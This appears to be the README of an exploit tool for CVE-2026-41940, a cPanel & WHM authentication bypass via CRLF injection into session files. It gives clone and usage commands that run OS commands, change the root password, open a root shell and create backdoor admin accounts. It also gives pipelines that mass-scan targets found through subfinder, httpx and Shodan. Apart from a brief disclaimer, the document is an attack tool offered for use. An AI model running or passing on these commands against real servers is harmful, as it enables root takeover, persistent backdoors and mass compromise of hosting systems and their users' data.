⚠ This tool is created solely for educational or bug bounty purpose only. Unauthorized use outside of controlled environments is strictly prohibited.

Description

A tool for exploiting CVE-2026-41940, a critical authentication bypass in cPanel & WHM (CVSS 10.0), allowing unauthenticated attackers to gain root-level WHM access by injecting CRLF sequences into server-side session files via the Authorization header — no credentials required.

How it works

CVE-2026-41940, in general terms, is exploited through a breakdown in how the system handles authentication sessions in cPanel/WHM. The attack typically begins with a normal request to the login interface, where the application prematurely initializes a session before fully validating user credentials. Because of improper handling of session-related input, certain crafted or unexpected input structures can alter how session data is stored or interpreted by the server.

Affected versions

Version Vulnerable Patched
110.x ≤ 11.110.0.96 11.110.0.97
118.x ≤ 11.118.0.62 11.118.0.63
126.x ≤ 11.126.0.53 11.126.0.54
132.x ≤ 11.132.0.28 11.132.0.29
134.x ≤ 11.134.0.19 11.134.0.20
136.x ≤ 11.136.0.4 11.136.0.5

Installation(Windows/Mac OS)🔄

git clone https://github.com/olofsatte/CVE-2026-41940-PoC
cd CVE-2026-41940-PoC
python3 exp.py

How to use

The tool expects a target domain to be specified.

Single target mode:

python exp.py -u https://target1.com:2083

You can also scan from the target.txt file(create it):

python exp.py -l target.txt -t 50 -o result.json

Basic scan:

Available commands:

python3 exp.py -u https://victim1.com:2083 # single target scan
python3 exp.py info -u https://victim1.com:2083 # Retrieves system information (version, load, disk usage).
python3 exp.py host -u https://victim1.com:2083 # Retrieves the hostname of the target server.

Post-Expoit actions

# List all accounts on the server
python3 exp.py list -u https://target.com:2087

# OS command
python3 exp.py cmd -u https://target.com:2087 --cmd "id;whoami;uname -a"
python3 exp.py cmd -u https://target.com:2087 --cmd "ls /home"

# Get server info (hostname, disk, MySQL host)
python3 exp.py info -u https://target.com:2087

# Change root password
python3 exp.py passwd -u https://target.com:2087 --passwd 'NewPassword1423!!@'

# Interactive WHM shell
python3 exp.py shell -u https://target.com:2087

Pipelines

# subfinder → httpx → cPanelSniper
subfinder -d victim.com -silent | \
  httpx -silent -ports 2085,2086 -threads 50 | \
  python3 exp.py scan -t 40 -o results.json

# From scope list
cat scope.txt | \
  httpx -silent -ports 2085,2086 -threads 100 | \
  python3 exp.py scan -t 30 -o results.json

# Shodan results
shodan search --fields ip_str,port 'title:"WHM Login"' | \
  awk '{print "https://"$1":"$2}' | \
  python3 exp.py -t 30 -o shodan_results.json

# Multiple sources combined
{ subfinder -d victim.com -silent; cat extra.txt; } | \
  httpx -silent -ports 2087 | \
  python3 exp.py -t 20 --action list

WHM Shell mode

After a succesful executuion, you can open an interactive WHM shell:

python3 exp.py shell -u

All shell Commands

Command Description
id Show User ID
hostname Get server hostname
accounts List all user accounts
info Load, disk, MySQL host, version
cat <path> Read file content
exec <cmd> Execute OS command
newadmin <user> <pass> Create backdoor WHM admin
passwd <pass> Change root password
l [path] List directory
help Show all commands
exit Exit shell mode

CLI Reference

usage: exp.py [-h] [-u URL] [-l LIST] [--hostname HOSTNAME]
                       [-t THREADS] [--timeout TIMEOUT] [--rate-limit N]
                       [--action ACTION] [--passwd PASS] [--cmd CMD]
                       [--new-user USER] [--new-domain DOMAIN]
                       [-o OUTPUT]

Target:
  -u, --url URL          Single target URL (e.g. https://host:2087)
  -l, --list LIST        File with URLs (one per line)
  --hostname HOSTNAME    Override canonical Host header (auto-discovered)

Scan:
  -t, --threads N        Concurrent threads (default: 10)
  --timeout N            Request timeout seconds (default: 15)
  --rate-limit N         Delay between targets (default: 0)
  --force                Skip cPanel detection check

Post-Exploit:
  --action ACTION        Action: list | passwd | cmd | exec | info |
                                 version | shell | adduser
  --passwd PASS          New root password (--action passwd)
  --cmd CMD              OS command (--action cmd/exec)
  --new-user USER        New cPanel username (--action adduser)
  --new-domain DOMAIN    New cPanel domain (--action adduser)

Output:
  -o, --output FILE      Save results to JSON file
  --no-color             Disable ANSI colors

Disclaimer

⚠ This tool is created solely for educational or bug bounty purpose only. Unauthorized use outside of controlled environments is strictly prohibited.